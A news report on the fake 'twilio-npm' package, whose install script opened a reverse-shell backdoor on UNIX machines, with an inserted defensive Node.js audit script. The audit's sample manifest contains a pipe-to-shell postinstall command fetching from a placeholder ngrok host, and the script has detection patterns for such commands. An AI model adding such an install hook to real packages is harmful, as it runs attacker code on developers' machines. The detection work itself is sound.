Malicious npm package posing as "twilio-npm" created a backdoor

The JavaScript library, meant to pass as a Twilio-related library, allowed a backdoor to be installed on programmers' computers so that attackers could access the infected workstations; it was uploaded to the open-source npm registry last Friday.

Fortunately, Sonatype's Release Integrity malware-hunting service quickly spotted the malware, in its three versions, and had it removed on Monday.

The npm security team removed a JavaScript library named "twilio-npm" from the npm website on Monday because it contained malicious code that could open backdoors on programmers' computers.

Packages containing malicious code have become a recurring theme in the open-source JavaScript code registry.

The JavaScript library (and its malicious behavior) was discovered this week by Sonatype, which monitors public package repositories as part of its DevSecOps security services.

In a report published Monday, Sonatype said the library was first published on the npm website on Friday, discovered the same day, and removed on Monday after the npm security team blacklisted the package.

There are many legitimate packages in the npm registry related to or representing Twilio's services.

But according to Ax Sharma, a security engineer at Sonatype, twilio-npm had nothing to do with the Twilio company. Twilio was not involved and has nothing to do with this attempted brand hijacking. Twilio is a leading cloud communications platform as a service that lets developers build VoIP-based applications that can make and receive phone calls and text messages.

Twilio's official npm package is downloaded nearly half a million times a week, according to the engineer. Its popularity explains why threat actors would be interested in trapping developers with a fake package of the same name.

"However, the twilio-npm package did not last long enough to fool many people. Uploaded on Friday, October 30, Sonatype's Release Integrity service flagged the package as malicious one day later - artificial intelligence and machine learning were evidently used. On Monday, November 2, the company published its findings and the code was removed."

Despite its short time on the npm portal, the library was downloaded more than 370 times and was automatically included in JavaScript projects created and managed through the npm command-line tool (Node Package Manager), according to Sharma. Many of those downloads most likely came from security scanners and from people who track changes to the npm registry.

The fake package is a one-liner piece of malware and had 3 versions available for download (1.0.0, 1.0.1 and 1.0.2). All three versions appear to have been published on the same day, October 30. Version 1.0.0 did not do much, according to Sharma. It only contained a small manifest file, package.json, that pulled a resource hosted on an ngrok subdomain.

ngrok is a legitimate service that developers use when testing their applications, especially to open connections to their "localhost" server applications behind NAT or a firewall. However, starting with versions 1.0.1 and 1.0.2, the same manifest file had its postinstall script modified to perform malicious actions, according to Sharma.

This effectively opens a backdoor on the user's machine, giving the attacker control over the compromised host and remote code execution (RCE) capabilities. Sharma said the reverse shell only works on UNIX-based operating systems.
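As an added example, not code from the article, Sonatype or the twilio-npm package itself: a small Node.js audit that flags install-time lifecycle scripts in package.json manifests with the traits described above (fetching from a tunnelling host such as an ngrok subdomain, piping a download into a shell). The manifests, hostname and commands are constructed samples.

```javascript
// Added example, not from the article or Sonatype: audit package.json
// manifests for risky install-time lifecycle scripts, the vector the
// twilio-npm package used. Manifests, host and commands are constructed.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Each pattern carries a weight; the verdict is derived from the total.
const RISK_PATTERNS = [
  { id: "tunnel-host", re: /\b[\w.-]*ngrok\.(io|app)\b|\bserveo\.net\b|\blocaltunnel\.me\b/i, weight: 3 },
  { id: "download-tool", re: /\b(curl|wget)\b/i, weight: 2 },
  { id: "pipe-to-shell", re: /\|\s*(ba|z|da)?sh\b/i, weight: 3 },
  { id: "inline-eval", re: /\b(bash|sh)\s+-c\b|\bnode\s+-e\b/i, weight: 2 },
];

// Constructed sample manifests (the hostname is a placeholder, not a real tunnel).
const SAMPLE_MANIFESTS = {
  plain: JSON.stringify({ name: "plain-lib", version: "1.0.0",
    scripts: { test: "node test.js" } }),
  native: JSON.stringify({ name: "native-addon", version: "2.1.0",
    scripts: { install: "node-gyp rebuild" } }),
  lookalike: JSON.stringify({ name: "twilio-npm-like", version: "1.0.2",
    scripts: { postinstall: "curl -s https://EXAMPLE-TUNNEL.ngrok.io/x | sh" } }),
};

// Inspect one manifest: which hooks run at install time, what they match, and a verdict.
function auditManifest(json) {
  const pkg = JSON.parse(json);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue; // hook not defined in this manifest
    for (const p of RISK_PATTERNS) {
      if (p.re.test(cmd)) findings.push({ hook, id: p.id, weight: p.weight });
    }
  }
  const score = findings.reduce((sum, f) => sum + f.weight, 0);
  return {
    name: pkg.name,
    version: pkg.version,
    hasLifecycleScript: LIFECYCLE_HOOKS.some((h) => typeof scripts[h] === "string"),
    score,
    findings,
    // A lone download tool deserves a look; a tunnel host or pipe-to-shell is a block.
    verdict: score >= 3 ? "block" : score > 0 ? "review" : "ok",
  };
}

// Audit every manifest and keep only those needing human attention.
function auditAll(manifests) {
  return Object.values(manifests).map(auditManifest).filter((r) => r.verdict !== "ok");
}
```

Running installs with `npm install --ignore-scripts` and reviewing the flagged hooks before enabling them is the matching mitigation; a build step such as `node-gyp rebuild` still passes the audit.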

Developers should rotate IDs, secrets and keys

The npm advisory says that developers who may have installed the malicious package before it was removed are at risk.

"Any computer on which this package was installed or run should be considered fully compromised," the npm security team said Monday, confirming Sonatype's findings.
